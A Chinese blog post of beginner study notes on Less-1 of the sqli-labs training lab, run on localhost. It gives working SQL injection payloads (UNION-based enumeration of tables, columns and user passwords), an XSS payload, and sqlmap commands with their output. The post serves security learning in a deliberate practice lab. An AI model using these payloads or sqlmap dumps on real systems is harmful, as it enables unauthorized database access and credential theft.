sqli-labs学习笔记 DAY1

最新推荐文章于 2022-06-10 15:10:50 发布
最新推荐文章于 2022-06-10 15:10:50 发布
阅读量413 收藏 2
点赞数 2
分类专栏: 安全 文章标签: CTF sql注入
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/y320284/article/details/87459571
版权

DAY 1

准备工作

  1. 安装phpstudy
  2. 安装配置sqli-labs

学习笔记

  • SQL语句的注释:–, #
  • +在URL经过编码后会编码为空格
  • SQL语句的查询语句:SELECT column_name,column_name FROM table_name;
  • SQL查询的条件限制:SELECT column_name,column_name FROM table_name WHERE conditon;

sqli-labs学习

  1. Please input the ID as parameter with numeric value
    • url:localhost/sqli-labs-master/Less-1/
    • 功能尝试:localhost/sqli-labs-master/Less-1/?id=1
    • 猜测:SELECT xxx FROM xxx WHERE id=x;(猜测id为数值型)
    • 尝试注入点:?id=1 and 1=2; --+
      • 原理:形成语句SELECT xxx FROM xxx WHERE id=1 and 1=2; --+;
      • 由于条件不成立,应该不会返回任何结果,则说明存在注入点。
      • 结果:结果显示正常
    • 猜测:SELECT xxx FROM xxx WHERE id=‘x’;(猜测id为文本)
    • 尝试注入点:?id=1’ and 1=2; --+
      • 结果:返回空白,存在注入点
    • 字段数猜解:?id=1’ ORDER BY n; --+(注意空格替换为+,其中n为猜解的字段数,如果报错,则说明猜解大于实际,如此进行二分猜解)
      • 原理:ORDER BY 是按照某一字段排序,可以跟字段名,也可以是字段序号
      • 结果:字段数为3
    • 回显点查询:?id=999’ UNION SELECT 1,2,3; --+
      • 原理:
        1. UNION为联合查询语句,与前面的查询一起返回记录
        2. SELECT 语句直接跟上常量,会把常量直接作为记录返回
      • 注意:前面的id改为一个不存在的记录,防止第一个SELECT语句占用回显点
      • 结果:显示了2和3
    • 查询数据库版本与路径:id=999’ UNION SELECT 1,@@version,@@datadir; --+
      • 原理:@@version显示数据库版本,@@datadir显示数据库文件的绝对路径
    • 查询用户与数据库:id=999’ UNION SELECT 1,user(),database(); --+
    • 查询所有表名:?id=999’ UNION SELECT 1,2,group_concat(table_name) FROM information_schema.tables WHERE table_schema=‘security’; --+
      • 结果:security数据库中的表——emails,referers,uagents,users
    • 查询所有列名:?id=999’ UNION SELECT 1,2,group_concat(column_name) FROM infromation_schema.columns WHERE table_name=‘users’; --+
      • 结果:users表的字段——user_id,first_name,last_name,user,password,avatar,last_login,failed_login,id,username,password
    • 获得用户名和密码:?id=999’ UNION SELECT 1,group_concat(username),group_concat(password) FROM security.users; --+

      • 结果:

          | username | password   |
  | -------- | --------   |
  | Dumb     | Dumb       |
  | Angelina | I-kill-you |
  | Dummy    | p@assword  |
  | ......   | ......     |
    • xss:?id=999’ UNION SELECT 1,"<script>alert(’/xss/’);</script>",3; --+
    • sqlmap使用:
      1. 测试命令:python sqlmap.py
      2. 检测注入点:python sqlmap.py -u “http://localhost/sqli-labs-master/Less-1/?id=1
        • -u参数:指定url
        • -p参数:指定某一个参数,只有一个参数可以省略,如python sqlmap.py -u “http://localhost/sqli-labs-master/Less-1/?id=1” -p id
        • 结果:
          Parameter: id (GET)

    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1' AND 2060=2060 AND 'ZMrl'='ZMrl

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY cl
ause (FLOOR)
    Payload: id=1' AND (SELECT 1251 FROM(SELECT COUNT(*),CONCAT(0x7170767871,(SE
LECT (ELT(1251=1251,1))),0x7171717871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA
.PLUGINS GROUP BY x)a) AND 'JIIM'='JIIM

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1' AND SLEEP(5) AND 'QAZn'='QAZn

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-1434' UNION ALL SELECT NULL,NULL,CONCAT(0x7170767871,0x6b504b575852654d52446e4c4c66695279724a6b566551444b4f525a63757861744269644772546f,0x7171717871)-- RGjJ
---
[15:09:24] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.4.45, Apache 2.4.23
back-end DBMS: MySQL >= 5.0
          从中可以看出注入参数为id,注入点支持基于布尔类型的注入,基于错误回显的注入、时间延迟的盲注还有联合查询。数据库类型为MySQL,操作系统是Windows,服务器类型是PHP5.4与Apache2.4,数据库版本大于5.0。
      3. 获取当前用户与当前数据库:python sqlmap.py -u “http://localhost/sqli-labs-master/Less-1/?id=1” --current-user --current-db
        • current-user参数:获取当前用户
        • current-db参数:获取当前数据库
      4. 查询数据库中的所有表:python sqlmap.py -u “http://localhost/sqli-labs-master/Less-1/?id=1” -D security --tables
        • -D参数:指定当前数据库
        • –tables参数:查询当前数据库所有表
      5. 查询字段名:python sqlmap.py -u “http://localhost/sqli-labs-master/Less-1/?id=1” -D security -T users --columns
        • -T参数:指定当前表
        • –columns参数:查询当前表所有字段名
      6. 查询所有记录:python sqlmap.py -u “http://localhost/sqli-labs-master/Less-1/?id=1” -D security -T users -C “username,password” --dump
        • -C参数:指定字段
        • –dump:查询记录
Tiumo
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqli-labs-master靶场安装下载
04-01
安装phpstudy、sqli-labs 适合人群:小白 安装sqli-labs报错如何解决
sql-labs题
ing_end的博客
11-05 3897
1.Please input the ID as parameter with numeric value,意思是:请以数字值作为参数输入id。 2.通过输入id得知用户名和密码。接下来我们要查询数据库中的数据。 判断 Sql 注入漏洞的类型: 1.数字型 2.字符型 其实所有的类型都是根据数据库本身表的类型所产生的,在我们创建表的时候会发现其后总有个数据类型的限制,而不同的数据库又有不同的数据类型,但是无论怎么分常用的查询数据类型总是以数字与字符来区分的,所以就会产生注入点为何种类...
sql-lab题解
qq_64584221的博客
04-08 410
zhiLess-1–基于单引号的字符型注入 初始界面: 上面提示: Please input the ID as parameter with numeric value 意思是我们应该输入一个ID信息 我们给他一个id的传参 ?id=1 在id的之后面加 ’ 可判断是否有漏洞 可以看到数据库报错了,最重要的就是能够看懂数据库的错误信息,从错误信息中我们可以知道是单引号的匹配出了问题,也就是说我们添加的单引号成功被数据库解析,那么我们就可以通过闭合这个id这个参数,然后插入自己...
sqli-labs解题记录
992宸的博客
02-01 1801
在数据库information_schema中的tables表里查询出security数据库的表有:emails,referers,uagents,users。在数据库information_schema中的tables表里查询出security数据库的表有:emails,referers,uagents,users。在数据库information_schema中的tables表里查询出security数据库的表有:emails,referers,uagents,users。,由此可知数据库名是8位。
SQL注入靶场通关
龙卷风摧毁停车场
04-08 1万+
SQL注入靶场通关 SQL注入简介 SQL注入是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。 SQL注入原理 SQL注入攻击是通过操作输入来修改SQL语句,用以达到执行代码对WEB服务器进行攻击的方法。就是在post/getweb表单、输入域名或页面请求的查询字符串中插入SQL命令,使web服务器执行恶意命
初学SQLi-LABS过关分享Less-3
SenTouKiReI的博客
06-10 769
初学sql注入SQLi-LABS过关分享Less-3
phpstudy+靶场sqli-labs-master下载
最新发布
11-08
【标题】"phpstudy+靶场sqli-labs-master下载" 涉及的主要知识点是PHPStudy集成环境和SQL注入漏洞靶场Sqli-Labs。这两个工具是学习和测试Web安全,尤其是SQL注入攻击与防御的重要资源。 PHPStudy是一款集成的PHP...
windows环境下安装sqli-labs
11-04
首先,我们需要下载 sqli-labs 源码,链接为 https://github.com/Audi-1/sqli-labs。然后,我们将源码解压到 web 目录下,在这里是 www 目录下。 数据库配置 接下来,我们需要配置数据库连接。在这里,我们需要...
sqli-labs-master.zip
11-20
最新sqli-labs代码,自己也可以到github下载:https://github.com/Audi-1/sqli-labs
jeakinscheung-sqli-labs-php7-master.zip
03-16
标题 "jeakinscheung-sqli-labs...总结,"jeakinscheung-sqli-labs-php7-master.zip" 提供了一个针对PHP7优化的SQL注入学习平台,涵盖了PHP版本兼容性问题和SQL注入的防范措施,是提升开发者安全意识和技能的宝贵资源。
BUUOJ-sqli_labs做题笔记
qq_52988674的博客
08-30 500
less-1 基于错误的单引号字符串 Please input the ID as parameter with numeric value根据该提示在url输入?id=1,可以看到回显正常,试着加一个单引号,页面报错 You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''1'' LI
sqli-lab通关笔记
SYJ_361的博客
12-15 2605
sqli-lab通关笔记前6关 Less-1–基于单引号的字符型注入 配置信息 ​ 在Lsee-1目录下的index.php中配置 echo $sql; echo "<br>"; 用于在网页显示sql语句 初始界面 上面提示: Please input the ID as parameter with numeric value 意思是我们应该输入一个ID信息 输入ID后的界面 首先,按F12–【hackbar】 然后,Load加载网页地址到URL上 在URL上输入【 ?id=1
小符sqli_labs1~65关的方法与感悟
fuyingyinger的博客
02-07 750
什么是SQL注入呢? SQL在管理数据库时,往往通过拼接的方式形成一个数据库语言,在拼接SQL语句的时候,可以通过改变SQL语句,让数据执行我们想要的语句,着同样也是危险的存在 开始前的心理准备 我真的是一脸懵啊,虽然前面也大致学过一些SQL语句,但是真当实践起来,还是懵的要死,还是多亏了学长给的资料sql注入天书还有找了找学长的博客才大致了解了这是什么东西,废话就不多说啦,冲冲冲! Page—1(Basic Challenges) Less-1 Get-Error based-Single quotes-
SQLi-Labs 学习笔记(Less 1-10)
Onlyme的博客
03-11 1万+
点击打开链接http://blog.csdn.net/u012763794/article/details/51207833http://blog.csdn.net/u012763794/article/details/51361152http://blog.csdn.net/u012763794/article/details/51457142Less-1 基于错误的 - get 单引号 - 字...
sqli-lab教程——1-35通关Writeup
热门推荐
地址ch3nye.top
09-11 10万+
刚做sqli-lab的时候,我逛了几个博客论坛没找到什么特别完整的教程,在这里写一篇更完整的教程。 本教程中使用到的大部分函数可以在我的 sql注入入门必备基础知识中找到具体说明和使用方法。 一些术语使用错误请见谅。 一些题目有多种方法,本人也是在学习当中,我会尽可能补全,但是精力有限,文章不尽完美,请见谅。 目录 Page-1(Basic Challenges) Less-1 ...
漏洞挖掘与防范(基础篇)
chaojixiaojingang
08-13 1万+
这几天学习代码审计,学的是漏洞与挖掘(基础篇),这相对于其他的漏洞挖掘确实简单点,这几种漏洞是常见的SQL注入漏洞、XSS漏洞、CSRF漏洞,讲的是这三种漏洞的从代码部分的挖掘技巧,我感觉很有用,就写下来,希望能帮助大家学习。 1. SQL注入漏洞 SQL注入漏洞是我们知道的最多的漏洞,原理是由于开发者在编写操作数据库代码时,直接将外部可控的参数拼接到SQL语句中,没有经过任何过滤就直接放入数...
sqli-Labs靶场笔记
young‘s blog
11-14 2912
点击打开链接http://blog.csdn.net/u012763794/article/details/51207833http://blog.csdn.net/u012763794/article/details/51361152http://blog.csdn.net/u012763794/artic...
sqli_labs第一关
qq726232111的博客
08-11 1670
小萌新入坑,从sqli-labs开始搞起 Less-1 提示:测试时要使用英文模式下字符!!!!!!要仔细查看是否字符有误导致无法返回信息!!!!! 0x0 信息分析 搭建好环境后来到Less-1的页面查看页面提示信息并分析 此时可以看到给出的提示信息 Please input the ID as parameter with numeric value 翻译 请输入ID作为...
MySQL注入实战指南——Sqli-labs教程解析
sqli-labs是一个在线平台,提供了多个级别的挑战,用于实践和学习SQL注入技巧。 2. **Sqli-labs下载与安装** 文档中提到了Sqli-labs的下载和安装过程,虽然具体内容未详述,但通常涉及获取源码、配置环境以及启动...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值